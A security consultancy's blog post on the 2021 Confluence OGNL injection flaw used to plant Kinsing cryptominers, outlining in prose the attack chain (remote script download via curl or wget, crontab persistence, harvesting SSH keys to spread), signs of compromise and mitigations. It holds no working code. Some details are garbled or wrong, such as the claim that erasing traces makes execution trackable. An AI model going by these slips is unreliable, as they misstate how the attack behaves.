Current security vulnerability in Confluence

ld - 5 min read
06. Sep. 21

The Confluence vulnerability announced by Atlassian on 26 August 2021 has been exploited in recent days to gain access to systems running the affected Confluence versions.

In most cases, people who exploited the vulnerability did not steal data, but in some cases successfully attempted to use the machines (servers, vms, etc.) as crypto-mining bots for a crypto-mining botnet.

What is mining?

To simplify things, the process known as mining describes the creation of new transaction blocks between mining bots. Currency is thus exchanged in a bot-net and the "miner" receives newly created coins. These coins can then be used by the miner for personal gain when he uses the cryptocurrency to buy items over the internet, for example. This process is called crypto mining.

How does hacking work?

To give you a more accurate insight into the hacking process, we explain the procedure in a little more detail: Via an OGNL injection, malicious code can be injected into a Java-based web application or corporate environment. OGNL or Object-Graph Navigation Language is an open-source expression language for Java objects. In particular, OGNL enables the evaluation of expression languages in Apache Struts, a framework for developing Java web applications such as Jira or Confluence. The most critical vulnerabilities on the list of Apache Struts CVEs, relate to OGNL expression injection attacks that allow the evaluation of invalid expressions against the value stack. This allows an attacker to modify system variables or execute arbitrary code.

Code passed by a malicious person can then be executed remotely. The infiltrated script then downloads another script, which is transferred from another source via the -curl or wget command. Once downloaded, it executes itself and deletes all traces of the installation data. This ensures that its execution can be analysed and tracked by monitoring tools.

The installed code uses the crontab, a scheduled task feature that most operating systems come with, and manipulates the user's crontab to download binaries from, for example, or kdevtmpfsi every minute. After these binaries have been downloaded, the actual mining process begins.

In some cases, the system is searched for known hosts and ssh keys in order to infect further systems.

The miner then uses the entire resources of the system to obtain cryptocurrencies.

How to notice that your system has been accessed:

The most obvious sign is constant 100% utilisation of the system's CPU for an extended period of time. You will also find suspicious crontab entries in /var/spool/cron/crontabs/. In most cases, the Confluence application will stop, but there are a few Confluence processes that can run without the Java runtime environment. Usually the miner will create and use files in /tmp/. In most cases you will find kinsing files in your system.

How venITure helps you prevent abuse:

To prevent abuse, you can enable a content security policy to prevent cross-site scripting, clickjacking and other code injection attacks that result from running malicious content in the trusted web page context.

Implement http headers such as 'Strict-transport-Security', 'Content-Security-Policy', 'X-Frame-Options', 'X-Content-Tpe-Options', 'Referrer-Policy'and 'Permissions-Policy'. All of these headers enforce policies that make access to the respective resources much more difficult. This can prevent hackers from abusing your web application to gain access to your server.

A web application firewall (WAF) is a special form of application firewall that filters, monitors and blocks HTTP traffic to and from a web service. By inspecting HTTP traffic, it can prevent attacks that exploit known vulnerabilities in a web application, such as SQL injection, cross-site scripting (XSS), file inclusion, and improper system configuration.

Atlassian recommends updating Confluence to the latest and most secure version.

If you have further questions on the topic or need support in implementing prevention measures, please feel free to contact us. 

You May Also Like

With our blog we keep you up-to-date and inform you about the latest developments in the field of Atlassian tools
and Infobip solutions.
How to implement the scaled agile framework with Atlassian

Agile practices have changed how we develop software and manage projects by keeping teams organized, efficient, and adaptable to change. It’s no small wonder that companies around the globe have decided to utilize the Agile framework across their entire enterprise and not just their software development teams. While the Scaled Agile Framework (SAFe) has the potential […]

What does it mean to scale agile? 

Teams worldwide use Agile, which is a well-known development methodology to create an environment of continuous delivery. Agile has become synonymous with high levels of collaboration, the ability to adapt quickly to change without disruption, and the rapid delivery of new features and innovations.  It’s no small wonder that enterprise-level companies want to roll out […]

Jira Align OKRs: Achieving perfect alignment in an imperfect world 

Objectives and Key Results (OKRs) is a collaborative goal-setting methodology used by teams and individuals to set challenging goals and focus their effort around the same important initiative(s). OKRs can help companies track progress and encourage engagement, but the core focus of OKRs is alignment. What are OKRs? “OKRs are clear vessels for leaders’ priorities […]

Contact experts